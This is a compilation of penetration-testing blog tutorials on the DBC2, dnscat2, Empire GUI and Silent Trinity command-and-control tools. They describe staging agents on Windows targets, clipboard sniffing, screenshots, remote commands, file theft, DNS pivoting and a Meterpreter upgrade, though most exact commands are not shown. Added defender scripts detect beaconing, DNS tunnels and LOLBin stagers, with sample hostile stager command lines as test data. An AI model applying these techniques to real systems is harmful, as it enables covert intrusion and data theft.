Command and Control with DropboxC2

In this article, we will learn how to use the DropboxC2 tool, also known as DBC2.

Table of Contents:

  • Introduction
  • Installation
  • Getting Dropbox API
  • Exploiting Target
  • Sniffing Clipboard
  • Capturing Screenshot
  • Command Execution
  • File Download

Introduction

DBC2 is primarily a post-exploitation tool. It consists of an agent running on the target’s machine, a controller running on any machine, PowerShell modules, and Dropbox servers used as the communication channel. It is inspired by the PowerShell Empire framework and is written in Python. Credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, we need the tool on our attacker machine. To do this, we clone the tool directly from GitHub.

After running the above command, a directory named DBC2 is created. We move inside that directory using the cd command. Next, we need to install the tool’s dependencies. There are several ways to do this, but here we use the pip command with the requirements.txt file that was cloned from git earlier.

Getting Dropbox API

This tool uses Dropbox servers as the medium for communicating with agents on the target machine. For that, it requires a Dropbox API access token. To get one, first create a Dropbox account, then go to the developer tools here. A webpage opens similar to the one shown below. Select “Dropbox API”, then under the type of access choose “App folder”. Name the app as you wish, then click the Create App button to proceed.

This leads to another webpage as shown below. Here, move to the OAuth 2 section and click Generate access token. The resulting token is the Dropbox API credential needed for this practical.

Copy the generated access token and return to the directory we cloned earlier. It contains a file named config.py. Open it with the nano command and paste the access token as the value of “defaultAccessToken”, as shown in the screenshot below.

Exploiting Target

Now it is time to run the tool; check that it has the appropriate permissions before running it. When we run the tool, we are greeted with a banner as shown in the image below, followed by some details about the author, version and tool. After this, it asks for a master password, which is used to encrypt all data exchanged between the agents and the controller. Enter a password of your choice. The tool encrypts the password entered and displays the result. We can copy the code shown and add it to config.py so that the master password is not asked for again. The tool then creates an incoming directory inside the directory we cloned earlier; this is used as a buffer for files retrieved from the target.

This tool requires the modules and stager to be uploaded to Dropbox before proceeding further. We do this using the command given below.

This uploads a file to Dropbox as shown in the image below. The file is encrypted using XOR encryption.

Now let’s check that the stage was published, using the command given below:

Now that the stage is uploaded, let’s use it to create a stager. We are going to create a batch file, but there are many other stager options: this tool provides stagers as a macro, a one-liner, JavaScript, an MSBuild SCT file and more. The command creates stager.bat in the tmp directory. We then send this batch file to the target machine.

After the batch file is executed on the target machine, a message on the terminal informs us that an agent was found, along with its ID. We use the list command to see the list of agents, copy the agent ID and use it to interact with the session as shown in the image.

This creates a file on Dropbox with the .status extension as shown in the image.
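A DBC2-style agent has no listener of its own: it polls Dropbox for tasking and writes results back, so on the network its only footprint is a host contacting the Dropbox API on a schedule. The detection script below is an added example written for this article, not DBC2 code or anything from Arno0x0x’s project. It runs over a constructed proxy log (IPs, hosts and user agents are made up) and flags clients whose requests to the Dropbox API domains recur at near-constant intervals. The API host list, the minimum request count and the jitter threshold are assumptions a defender would tune to their own environment.

```python
"""Flag machine-like polling of the Dropbox API in proxy logs.

Added example for this article (not DBC2 code). Input is a constructed
proxy log: timestamp, client IP, destination host, user agent.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log. 10.0.0.5 polls the API every 30 s from PowerShell,
# 10.0.0.9 is a person using the Dropbox website, 10.0.0.7 is unrelated traffic.
SAMPLE_LOG = """\
2024-01-15T09:00:00 10.0.0.5 api.dropboxapi.com PowerShell/5.1
2024-01-15T09:00:30 10.0.0.5 api.dropboxapi.com PowerShell/5.1
2024-01-15T09:01:00 10.0.0.5 api.dropboxapi.com PowerShell/5.1
2024-01-15T09:01:30 10.0.0.5 api.dropboxapi.com PowerShell/5.1
2024-01-15T09:02:00 10.0.0.5 api.dropboxapi.com PowerShell/5.1
2024-01-15T09:00:07 10.0.0.9 www.dropbox.com Mozilla/5.0
2024-01-15T09:03:41 10.0.0.9 www.dropbox.com Mozilla/5.0
2024-01-15T09:12:05 10.0.0.9 www.dropbox.com Mozilla/5.0
2024-01-15T09:00:10 10.0.0.7 example.org Mozilla/5.0
2024-01-15T09:00:20 10.0.0.7 example.org Mozilla/5.0
2024-01-15T09:00:30 10.0.0.7 example.org Mozilla/5.0
2024-01-15T09:00:40 10.0.0.7 example.org Mozilla/5.0
"""

# Assumed: API endpoints an agent would use; the web UI host is deliberately excluded.
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "notify.dropboxapi.com"}
MIN_REQUESTS = 4   # assumption: fewer requests give no usable period estimate
MAX_JITTER = 0.2   # assumption: stdev/mean of request gaps; human use is far noisier


def parse_log(text):
    """Return (timestamp, client_ip, host, user_agent) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, host, ua = line.split(None, 3)
        events.append((datetime.fromisoformat(ts), ip, host, ua))
    return events


def find_beacons(events):
    """Group API requests per (client, host, UA) and score how regular the gaps are."""
    series = defaultdict(list)
    for ts, ip, host, ua in events:
        if host in DROPBOX_API_HOSTS:
            series[(ip, host, ua)].append(ts)

    findings = []
    for (ip, host, ua), stamps in series.items():
        stamps.sort()
        if len(stamps) < MIN_REQUESTS:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= MAX_JITTER:
            findings.append({
                "client": ip,
                "host": host,
                "user_agent": ua,
                "browser_ua": ua.startswith("Mozilla/"),
                "requests": len(stamps),
                "period_s": round(mean, 1),
                "jitter": round(jitter, 3),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

Only the scheduled PowerShell client is reported; the browser session to www.dropbox.com is excluded by the host list, and the equally regular traffic from 10.0.0.7 is not Dropbox API traffic at all. In practice the period and jitter values are what you would feed into a ticket, together with the non-browser user agent.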

Clipboard Sniffing

We can retrieve the data that the target has on its clipboard, that is, whatever he/she has copied. To do this, start the sniffer with the command clipboardLogger start, wait until the target copies some data, then stop the sniffer with the command clipboardLogger stop. After the sniffer is stopped, the clipboard contents are saved to a text file inside the incoming directory.

Let’s take a look at what the target copied on his/her machine. We use the cat command in a new Kali terminal to read the file as shown in the image.

Capturing Screenshot

Furthermore, we can grab a screenshot of the target machine. To do this we use the screenshot command as shown in the image.

The screenshot is captured and stored in the incoming directory. In the image we can see that the target is browsing a website on his/her machine.

Command Execution

We can run PowerShell commands on the target machine using the cmd parameter. The tool does not offer an interactive shell, but it can execute one command at a time: we type cmd and it then asks for the command to execute. Here we run the command dir and get the list of files as shown in the image.

File Download

Furthermore, we can download files from the target. To do this, use the command getFile followed by the file name or path. This downloads the file from the target to our attacker machine.

The tool stores the downloaded file inside the incoming directory discussed earlier. We can view the file using the cat command as shown in the image below.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

dnscat2: Command and Control over the DNS

In this article, we learn DNS tunnelling through an amazing tool, dnscat2.

Table of Contents:

  • Introduction to DNS
  • Introduction to DNScat
  • Installation
  • DNS tunneling
  • Conclusion

Introduction to DNS

The Domain Name System (DNS) maps domain names to IP addresses. With DNS, it is possible to type words rather than a series of numbers into a browser, so people can look up sites and send messages using familiar names. When you enter a domain name in a browser, it sends a query to a DNS server to match the domain with its IP address. Once found, the IP address is used to retrieve the site’s content. Remarkably, this entire process takes only milliseconds. DNS uses port 53 for all of this.

Introduction to DNScat

dnscat2 is a highly regarded tool because it creates a command and control tunnel over the DNS protocol, which lets an attacker work in stealth. Over it you can access any data, upload and download files, and get a shell. For this tool to work over port 53 you don’t need authoritative access to a DNS server; you can simply establish your connection over port 53, which is faster and is still seen as ordinary traffic. It does, however, make its presence well known in the packet log.

dnscat2 is made of two components, a server and a client. To understand how dnscat2 works, it is important to understand both.

The client is intended to run on a target machine. It is written in C and has minimal prerequisites. When you run the client, you normally specify a domain name. All packets are sent to the local DNS server, which forwards them to the authoritative DNS server for that domain (which you, presumably, control).

The server is intended to run on an authoritative DNS server. It is written in Ruby and depends on a few gems. When you run it, much like the client, you specify which domain(s) it listens for on port 53. When it receives traffic for one of those domains, it attempts to establish a legitimate connection. Other traffic it receives is ignored by default, although it can also forward it upstream.

Installation

Run the following git command to download dnscat2:

Now install bundler, as it is a major dependency for dnscat2. To install bundler, go into the server directory of dnscat2 and type:

Once everything is done, run the server with the following command:

Similarly, download dnscat2 on the client machine too, and use the make command to compile it, as shown in the image below:

To establish a connection between client and server, use the following command:

Once the connection is established, you can see on the server side that you have a session, as shown in the image below. Use the command ‘sessions’ to check for the session that was created.

To interact with the said session, type the following command:

Now that you can access the session, use the word ‘ping’ to ping the target; if it replies ‘Pong!’ then your ping was successful.

The following will be the response on the client side to the ping command.

Further, with the help command you can see all the options available to you. If you want to go to the shell, just type ‘shell’ and it opens a new window with the session to interact with the shell of the target system.

To interact with the shell session opened in the new terminal, type the following set of commands:

Once you are in the session, you can execute any shell command, like ‘uname -a’, as shown in the image above.

DNS Tunnelling

DNS tunnelling is the best attack available through dnscat2. If, using ifconfig, you find two networks on your target system, as shown in the image below, you can easily perform DNS tunnelling into the second one.

For DNS tunnelling, type the following command:

Now you can try to connect to the SSH port with the following command:

Then, once connected, you can use the ‘ifconfig’ command to see the network you have tunnelled into, as shown in the following image:

As you now have SSH control of the second network too, you can download dnscat2 in that network in order to attack it as well. Once you have downloaded dnscat2 there, type the following command to run it and get a session on the dnscat2 server:

Once the above command is executed, you will have a new session that you can access with the following set of commands:

Once you have access to the session, you can run any command.

When you then use the systeminfo command, it shows the details of the second system that you have gained access to through tunnelling.

Conclusion

Even in the most restricted environments, DNS traffic is usually permitted so that hosts can resolve internal or external names. This makes DNS usable as a communication channel between a target host and the command and control server. Commands and data are carried inside DNS queries and responses, which is why detection is difficult: arbitrary commands hide in plain sight because the traffic is perceived as legitimate. This is exactly what dnscat2 takes advantage of, making it a successful tool for attack.
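The client/server description above and this conclusion both come down to one observable: the payload has to travel inside the query name and the answer record, so a tunnel leaves long, high-entropy subdomains and an unusual mix of record types all pointed at one domain. The script below is an added example written for this article, not dnscat2 code. It runs over a constructed DNS query log (the client IPs, names and hex labels are made up) and aggregates per client and base domain, scoring mean payload length, Shannon entropy and the share of TXT/CNAME/MX/NULL lookups. The base-domain heuristic (last two labels) and every threshold are assumptions to be tuned against a real resolver’s baseline.

```python
"""Score DNS query logs for dnscat2-style tunnelling.

Added example for this article (not dnscat2 code). Input is a constructed
query log: client IP, query type, queried name.
"""
import math
from collections import Counter, defaultdict

# Constructed log. 10.0.0.5 shows the tunnelling pattern (long hex labels,
# TXT/CNAME/MX lookups, one domain); the other clients are ordinary lookups.
SAMPLE_QUERIES = """\
10.0.0.5 TXT 7a9c01d4e5f6b2a3c8d9e0f1a2b3c4d5e6f7a8b9.c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5.tunnel.example.net
10.0.0.5 TXT 3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f.f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8.tunnel.example.net
10.0.0.5 CNAME 9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a.b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4.tunnel.example.net
10.0.0.5 MX 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b.c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6.tunnel.example.net
10.0.0.5 TXT 5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e.f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0.tunnel.example.net
10.0.0.9 A www.example.com
10.0.0.9 A mail.example.com
10.0.0.9 AAAA cdn.example.com
10.0.0.7 A login.example.org
10.0.0.7 A www.example.com
"""

# Thresholds are assumptions to tune per environment.
UNUSUAL_TYPES = {"TXT", "CNAME", "MX", "NULL"}
MIN_QUERIES = 5            # need a burst, not a single odd lookup
MIN_MEAN_PAYLOAD_LEN = 40  # characters of name in front of the base domain
MIN_MEAN_ENTROPY = 3.0     # bits/char; hex data approaches 4.0, words sit near 2-3


def shannon_entropy(s):
    """Bits per character of the string s."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name):
    """Return (payload, base_domain); base domain = last two labels (simplification)."""
    labels = name.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", name
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_queries(text):
    """Return (client_ip, qtype, name) tuples from the whitespace-separated log."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            ip, qtype, name = line.split()
            rows.append((ip, qtype.upper(), name.lower()))
    return rows


def find_tunnels(rows):
    """Aggregate per (client, base domain) and flag tunnel-like statistics."""
    buckets = defaultdict(list)
    for ip, qtype, name in rows:
        payload, base = split_name(name)
        buckets[(ip, base)].append((qtype, payload))

    findings = []
    for (ip, base), items in buckets.items():
        if len(items) < MIN_QUERIES:
            continue
        mean_len = sum(len(p) for _, p in items) / len(items)
        mean_ent = sum(shannon_entropy(p) for _, p in items) / len(items)
        unusual = sum(1 for t, _ in items if t in UNUSUAL_TYPES) / len(items)
        if mean_len >= MIN_MEAN_PAYLOAD_LEN and mean_ent >= MIN_MEAN_ENTROPY:
            findings.append({"client": ip, "domain": base, "queries": len(items),
                             "mean_payload_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2),
                             "unusual_type_ratio": round(unusual, 2)})
    return findings


if __name__ == "__main__":
    for finding in find_tunnels(parse_queries(SAMPLE_QUERIES)):
        print(finding)
```

The unusual-type ratio is reported rather than used as a hard gate, because a tunnel can be run over A/AAAA lookups alone at lower bandwidth; length and entropy per domain are the more robust signal, and volume per domain over time is what a resolver log lets you add next.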

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

Empire GUI: Graphical Interface to the Empire Post-Exploitation Framework

This is our 8th post in the Empire series and it covers how to use Empire through its GUI. Empire has a great GUI, but it is still under development as it was released only a short while ago. For the Empire GUI to work, we need to download all of its dependencies, and this is where it gets a bit complicated. So, first of all, we download the 3.0 beta version of Empire, as it is the only version compatible with the GUI, using the following commands:

Now run the following command as instructed on the GitHub page:

Now, to install the beta version, type the following command:

Now, to run Empire, use the following command, which links the command line to the GUI version:

As shown in the image below, Empire starts.

Now, download the Empire GUI from GitHub using the following command:

Now that the Empire GUI and the beta version of Empire have been downloaded, we need to install the GUI’s dependencies for it to work. For that, we first have to download nodejs; to download it, type:

In time, it will be installed as shown in the image below:

After nodejs, we have to download npm, and for that type:

Once it has downloaded, as in the image above, run the following command to install it:

Then start the npm service, as shown in the image below, with the following command:

After all this, the Empire GUI starts as shown in the image below:

Moving further, once the Empire GUI is up and running, create a stager and get an agent from the beta version of Empire. While getting a session, remember to use port 1337, as that is the port the GUI works on.

Now, on the GUI, log in using your IP, port and the other details as shown in the image below:

Once you log in, it shows you all the sessions you have, just like in the image below:

Here, all the shell commands work as shown in the image above. As the GUI is still under development, we cannot use it for post-exploitation, but it comes in pretty handy for managing multiple sessions and helps you understand how Empire works.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

Command & Control: Silenttrinity Post-Exploitation Agent

In this article, we will learn to use the Silent Trinity tool to exploit Windows.

Table of Contents:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Silent trinity to meterpreter

Introduction

Silent Trinity is a command and control tool dedicated to Windows. It was developed by byt3bl33d3r using Python, IronPython, C# and .NET. As it is a Windows-dedicated tool, C# was the obvious choice, since it has direct access to the .NET framework just like PowerShell. It is an amazing post-exploitation tool for Windows, and it supports a C2 server over HTTP/1.1.

Installation

Installing Silent Trinity is pretty easy: download it using git clone and then install its dependencies using pip. To download Silent Trinity, use the following command:

Now install all the requirements using the following commands:

Once the installation is complete, start the tool as shown in the image below:

Windows Exploitation

With the tool up and running, use the ‘list’ command to see the listeners available. As you can see in the image below, only two listeners are available, http and https. To start a listener, use the following set of commands:

When starting the listener, there is no need to give an IP address or port: it automatically takes the IP of the local machine, and the port is pre-defined by the listener type, port 80 for the http listener and port 443 for the https listener. As you can see in the image below, the above commands have started our listener:

Having dealt with listeners, we move on to stagers. As with listeners, use the ‘list’ command to see all the available stagers. Because this is a Windows-dedicated tool, there are only three stagers, all for Windows: msbuild, wmic and PowerShell. To generate the stager, use the following set of commands:

Executing the above commands creates a file. Serve that file to the target system using a Python web server as shown in the image below:

Now, run the file in the command prompt of the target system with the following command:

Once the file executes, a session is generated, as you can see in the image below.
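Each of the three stagers named above runs through a signed Windows binary (msbuild.exe, wmic.exe or powershell.exe), so for a defender the detection opportunity is process-creation telemetry rather than a file signature. The triage script below is an added example written for this article, not part of Silent Trinity or byt3bl33d3r’s code. It runs over constructed Sysmon-style process events (paths, the 192.0.2.10 documentation address and the base64 blob are made-up placeholders) and applies three heuristics: MSBuild building a project from a user-writable directory, WMIC rendering a remote or local XSL stylesheet, and PowerShell launched with an encoded command or hidden window. The rule names and regular expressions are assumptions a team would tune against its own baseline of developer and admin activity.

```python
"""Triage process-creation events for the LOLBin stagers named above.

Added example for this article (not Silent Trinity code). Events are
constructed Sysmon-style records: image path, command line, parent image.
"""
import re

# Constructed events. 192.0.2.10 is a documentation address and the -enc blob
# is a placeholder (base64 of "AAAAAAAAAAAA"), not a real payload.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stager.xml",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://192.0.2.10/stager.xsl"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFB",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign: a developer build and a scheduled maintenance script.
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\MyApp\MyApp.sln /p:Configuration=Release",
     "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1",
     "parent": r"C:\Windows\System32\svchost.exe"},
]

# Assumed patterns; widen or narrow them against your own baseline.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Windows\\Temp\\",
    re.I)
WMIC_XSL = re.compile(r'/format:\s*"?(?:https?://|[^\s"]*\.xsl)', re.I)
PS_SUSPICIOUS = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|(?:^|\s)-nop\b",
    re.I)


def image_name(event):
    """Lower-cased file name of the executed image."""
    return event["image"].rsplit("\\", 1)[-1].lower()


RULES = [
    ("msbuild project from user-writable path",
     lambda e: image_name(e) == "msbuild.exe" and bool(USER_WRITABLE.search(e["cmdline"]))),
    ("wmic rendering xsl stylesheet",
     lambda e: image_name(e) == "wmic.exe" and bool(WMIC_XSL.search(e["cmdline"]))),
    ("powershell encoded or hidden",
     lambda e: image_name(e) == "powershell.exe" and bool(PS_SUSPICIOUS.search(e["cmdline"]))),
]


def triage(events):
    """Return (rule name, parent image name, command line) for every matching event."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["parent"].rsplit("\\", 1)[-1].lower(), e["cmdline"]))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The parent image is carried in each hit because it is the cheapest second signal: all three stagers here are spawned from cmd.exe, whereas the benign MSBuild run comes from the IDE and the benign PowerShell from a service host. Neither benign event trips a rule, which is the property to keep when you add patterns.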

Windows Post Exploitation

With the session generated, you can again use the ‘list’ command to see the post-exploitation modules available, some of which we show in this article, as shown in the image below:

Let’s try the message box module. Its purpose is to pop up a message on the victim’s PC. To use it, run the following set of commands:

As a result, a message box pops up on the target machine, as you can see in the image below:

The next module retrieves basic information about the target system. For this, type the following set of commands:

There is also a module for host enumeration; to run it, type the following set of commands:

As you can see in the image below, you get catalogued and detailed information about your target system:

With the next module, you can access the shell of the target system, but only one command at a time; for this, type:

As shown in the image below, it runs the ipconfig command through the session it has access to.

Silent trinity to meterpreter

To get a Meterpreter session via Silent Trinity, start Metasploit with the msfconsole command in a new terminal and use the web_delivery exploit with the following command:

Running the above commands generates a command that is to be run on the target system, as shown in the image below:

The generated command is to be run in the shell of the victim’s PC. To do that, execute it through Silent Trinity in the same way we ran the ipconfig command earlier:

run <session name>

Once the command runs through Silent Trinity, you have your Meterpreter session as shown in the image below:

So, all in all, Silent Trinity is an amazing tool when it comes to exploiting Windows.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cybersecurity enthusiast. Contact Here